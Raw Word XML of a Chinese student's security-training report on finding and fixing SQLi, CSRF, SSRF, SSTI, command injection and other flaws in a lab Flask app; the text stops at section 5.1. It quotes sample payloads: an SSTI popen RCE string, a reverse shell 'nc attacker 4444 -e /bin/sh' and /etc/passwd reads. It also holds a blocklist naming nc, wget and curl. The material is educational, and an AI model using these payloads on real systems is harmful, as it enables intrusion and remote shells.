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6"/>
        </w:rPr>
        <w:t>网络安全实训报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>从漏洞分析到安全加固的完整实践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姓名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王宇杨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实训周期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2026年7月19日 — 2026年7月27日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实训环境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Kali Linux + OpenClaw + Burp Suite + Chrome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实训项目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用户管理系统（Flask Web 应用）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远程仓库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https://github.com/1343313511/shixun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报告日期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2026年07月27日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before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>一、实训概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>二、实训环境与工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>三、实训内容与成果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.1 环境搭建与基础配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.2 密码安全与暴力破解防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.3 SQL 注入漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.4 越权漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.5 CSRF 漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.6 文件上传漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.7 文件包含与 XSS 漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.8 SSRF 漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.9 SSTI 模板注入漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.10 命令注入漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.11 Shell 反弹与 Linux 利用手法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>四、项目综合安全架构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>五、实训总结与收获</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、实训概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次网络安全实训以 Kali Linux 为操作平台，以一个完整的 Flask Web 用户管理系统为靶标，从攻防两个视角系统性地开展了安全实训。实训覆盖了 OWASP Top 10 中多个核心漏洞类型，包括 SQL 注入、越权访问、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI 模板注入、命令注入等，同时还涉及密码安全、暴力破解防御、Shell 反弹、Linux 提权、隧道代理等渗透测试技术。通过"发现问题 → 分析原理 → 验证利用 → 安全修复"的完整闭环，达到了理解漏洞本质、掌握修复方法、建立安全编码思维的目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、实训环境与工具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工具 / 平台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操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Kali Linux 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>渗透测试平台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>AI / 自动化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>OpenClaw AI Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>漏洞扫描、修复辅助、报告生成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Web 应用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Flask（Python）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>实训靶标项目开发框架</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>代理抓包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Burp Suite Professional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>HTTP 请求拦截、重放、字典攻击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项目数据存储</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>版本控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Git + GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>代码管理与报告存档</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Chrome / Chromium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>前端调试与验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>实训项目简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训项目名称为"用户管理系统"（Class01），是一个基于 Flask 框架开发的 Web 应用，功能涵盖用户注册登录、个人资料管理、头像上传、URL 抓取、搜索、页面管理、Ping 网络诊断等。项目源码托管于 GitHub 仓库 https://github.com/1343313511/shixun，前后共经过 20 次 Git 提交，完成了从初始版本到全面安全加固的演进。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、实训内容与成果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 环境搭建与基础配置（Day 1）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训首日完成了 Kali Linux 操作系统的初始化配置，包括系统更新、网络配置、基础工具链安装。随后完成了 OpenClaw AI 系统的安装部署，并将其对接 QQ Bot 通道，实现了通过 QQ 与 AI Agent 交互的能力，为后续自动化漏洞分析和报告生成奠定了基础。最后，将实训项目 Fork 到本地并推送至个人 GitHub 仓库，建立了版本管理规范。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 密码安全与暴力破解防御（Day 1-2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>密码安全是 Web 安全的第一道防线。实训内容涵盖四个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>常见系统默认密码：梳理了路由器、数据库、中间件等常见系统的默认账号密码，建立了安全意识基线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>用户名密码泄露：分析了密码泄露的常见途径（数据库注入、日志泄漏、社工库），学习了密码保护策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Burp Suite 配置与使用：配置了 Burp Suite 代理，掌握请求拦截、修改、重放等核心功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>字典攻击实战：使用 Burp Suite Intruder 模块搭配字典对登录接口进行暴力破解攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>防护修复：针对暴力破解风险，在项目中实现了指数退避延迟算法（连续失败后等待时间指数增长）、图形验证码验证、账号锁定机制（5 次失败后锁定 15 分钟）、密码哈希存储（Werkzeug generate_password_hash）以及登录时间线攻击防护（固定比较时间，不提前返回）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 SQL 注入漏洞修复（Day 2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训项目初始版本的所有数据库操作均使用 f-string 拼接 SQL 语句，存在严重的 SQL 注入漏洞。例如，登录接口直接拼接用户名和密码到 SQL 查询中，攻击者可以输入 admin' OR '1'='1 绕过认证，或在搜索接口中使用 UNION SELECT 读取任意表数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>修复方案：将所有 SQL 操作统一改为参数化查询（cursor.execute(sql, (param1, param2, ...))），利用数据库驱动内置的转义机制彻底杜绝 SQL 注入。同时明文密码改为哈希存储，用户输入长度做了上限限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 越权漏洞修复（Day 2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>初始项目存在垂直越权漏洞：未登录用户可以直接访问 /profile、/upload 等需要认证的页面。修复方案：新增 login_required 装饰器，在需要登录的路由上添加 @login_required() 装饰，未登录时自动重定向到登录页面。同时增加水平越权防护，在个人中心页面校验当前用户只能访问自己的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 CSRF 漏洞修复（Day 3）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSRF（跨站请求伪造）漏洞存在于所有需要认证的 POST 操作中。攻击者可以构造恶意页面，诱导已登录用户触发请求，从而以用户身份执行非预期操作。修复方案：使用 Flask-WTF 提供的 CSRFProtect 中间件，在全局启用 CSRF 令牌验证；在模板中的表单里添加 {{ form.csrf_token }} 或 &lt;input type="hidden" name="csrf_token" value="{{ csrf_token() }}"&gt;，确保每个 POST 请求都附带唯一令牌。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.6 文件上传漏洞修复（Day 2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>文件上传功能存在两个严重漏洞：</w:t>
        <w:br/>
        <w:t>1）路径穿越：上传文件名未做安全检查，攻击者可以使用 ../../etc/shell.php 路径穿越到系统目录</w:t>
        <w:br/>
        <w:t>2）类型绕过：仅检查 Content-Type 头判断文件类型，攻击者可以修改 Content-Type 上传任意恶意文件</w:t>
        <w:br/>
        <w:t>修复方案：使用 werkzeug.secure_filename() 处理上传文件名，移除所有路径分隔符；新增文件魔数（Magic Number）校验，在服务端读取文件头字节验证真实文件类型（图片文件的前几个字节有固定特征），防止通过修改 Content-Type 绕过检测。限制上传文件大小为 2MB。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.7 文件包含与 XSS 漏洞修复（Day 4）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/page 路由存在本地文件包含漏洞：从 pages/ 目录读取文件时未做充分的路径校验，攻击者可以使用 ../ 读取系统文件。XSS 漏洞存在于用户昵称、搜索框、反馈等多个输入点，用户输入直接渲染到页面上未做转义。修复方案：对文件包含使用 os.path.normpath + os.path.realpath 双重解析，并校验路径是否严格在 pages_dir 前缀下。XSS 修复使用 html.escape() 对所有用户输入进行HTML 实体转义后渲染到模板中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.8 SSRF 漏洞修复（Day 5）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/fetch-url 路由存在服务端请求伪造漏洞：用户提交 URL 后服务端直接使用 urllib 发起请求，未做任何过滤，攻击者可以访问内网服务（如 127.0.0.1:5000、内网 Redis、数据库等）。修复方案：URL 白名单校验，只允许 http/https 协议；内网地址黑名单过滤（127.0.0.1、10.x.x.x、172.16-31.x.x、192.168.x.x）；自定义 DNS 解析，在请求前先用 socket.getaddrinfo 解析域名，如果结果指向内网则拒绝请求；设置 socket.setdefaulttimeout 超时控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.9 SSTI 模板注入漏洞修复（Day 6）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/welcome 和 /feedback 路由使用 render_template_string() 并且直接将用户输入拼接到模板字符串中，攻击者可以注入 {{config}} 泄露 Flask 密钥，或通过 {{config.__class__.__init__.__globals__["os"].popen("id").read()}}执行任意系统命令，造成远程代码执行（RCE）。使用自动化扫描工具验证了完整的攻击链，从基础注入探测 {{7*7}} 到读取 /etc/passwd 均可成功。修复方案：新增 safe_str() 函数对所有用户输入执行 html.escape() 转义后再拼接模板字符串，将 {{}} 等模板语法标记转义为 HTML 实体，使 Jinja2 引擎无法解析。同时建议优先使用 render_template 而非 render_template_string。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.10 命令注入漏洞修复（Day 7）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>新增加的 /ping 路由使用 f"ping -c 3 {ip}" 字符串拼接命令并设置 shell=True，将用户输入直接传递给 /bin/sh 解析执行。攻击者可以输入 8.8.8.8;id 同时执行 ping 和 id 命令，或者 8.8.8.8|cat /etc/passwd 读取系统文件，甚至 8.8.8.8|nc attacker 4444 -e /bin/sh 反弹 Shell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>修复方案采用三层防御策略：</w:t>
        <w:br/>
        <w:t>第一层：白名单字符校验 — 正则 ^[a-zA-Z0-9.\-]+$ 仅允许合法字符，拒绝所有 shell 元字符</w:t>
        <w:br/>
        <w:t>第二层：危险关键词拦截 — 检测 rm、mkfs、bash、wget、curl、nc 等命令关键词</w:t>
        <w:br/>
        <w:t>第三层：参数列表执行 — 改为 ["ping", "-c", "3", ip] 参数列表形式，彻底禁用 shell=True</w:t>
        <w:br/>
        <w:t>此外，对看起来是 IP 的输入使用 ipaddress.IPv4Address 做严格格式校验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.11 Shell 反弹与 Linux 利用手法（穿插实训）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训期间穿插学习了以下渗透测试进阶技术：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Shell 反弹手法：掌握了 bash / nc / Python / PHP 等多种反向 Shell 的构造方式，理解了正向连接与反向连接的应用场景及防火墙穿透原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>PHP 反弹 Shell 木马使用：编写了 PHP 一句话木马结合反向 Shell 实现 WebShell 管理，理解了文件上传漏洞与命令执行的组合利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Linux 常见利用手法：学习了 SUID 提权、计划任务利用、sudo 配置错误、内核漏洞提权、docker 逃逸等 Linux 系统层面的攻击手法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>NPS 客户端配置：学习了使用 NPS（内网穿透工具）配置客户端隧道，实现了从外网访问内网 Web 服务的能力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>FRP 内网穿透（CVE-2026-40910）：分析了 frp 最新的 TOP 7 漏洞，理解了代理隧道在内网渗透中的关键作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>WAF 绕过 Fuzz 测试：针对 SQLi-LABS 靶场开展了 WAF 绕过模糊测试，掌握了注释符绕过、大小写混淆、双写绕过、编码绕过等技巧</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、项目综合安全架构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>经过为期九天的系统性安全加固，用户管理系统的整体安全架构发生了质的飞跃。以下从攻击面覆盖和防御纵深两个维度进行总结。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 修复漏洞总览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漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc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关键修复措施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SQL 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>参数化查询，哈希存储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垂直/水平越权</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>login_required 装饰器 + 用户校验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CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CSRFProtect 中间件 + 令牌验证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文件上传绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>魔数校验 + secure_filename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文件包含/XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🟠 高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>路径规范化 + html.escape 转义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SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DNS 解析 + 内网黑名单 + 白名单协议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SSTI 模板注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>html.escape 转义模板变量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命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>参数列表 + 字符白名单校验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暴力破解/密码泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🟠 高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>指数退避 + 验证码 + 账号锁定 + 哈希</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 防御纵深体系</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训项目最终形成的安全架构体现了纵深防御（Defense in Depth）的设计理念：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>第一层 — 输入验证层：所有用户输入经过白名单校验 / 长度限制 / 格式校验，拒绝非法输入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>第二层 — 参数化处理层：数据库操作使用参数化查询，系统命令使用参数列表，模板变量使用转义函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>第三层 — 认证授权层：登录认证 + CSRF 令牌 + 权限校验，确保请求合法且用户有权操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>第四层 — 输出编码层：所有用户数据输出经过 HTML 转义，防止 XSS 和模板注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>第五层 — 资源限制层：文件大小限制、请求超时控制、登录尝试次数限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>第六层 — 审计日志层：关键操作记录日志，便于事后追溯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 安全开发规范沉淀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训过程中沉淀了以下安全开发规范：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>所有用户输入不可信，严格校验后再处理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>禁止使用字符串拼接 SQL（必须用参数化查询）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>禁止使用 shell=True + 字符串拼接执行系统命令（必须用参数列表）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>优先使用 render_template 传递变量，避免 render_template_string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>所有输出到 HTML 的内容必须经过 html.escape 转义</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>文件上传使用魔数校验而非仅依赖 Content-Type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CSRF 保护是 POST 请求的标配，不可省略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>认证授权必须在服务端完成，前端控制仅为辅助</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、实训总结与收获</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 知识体系构建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
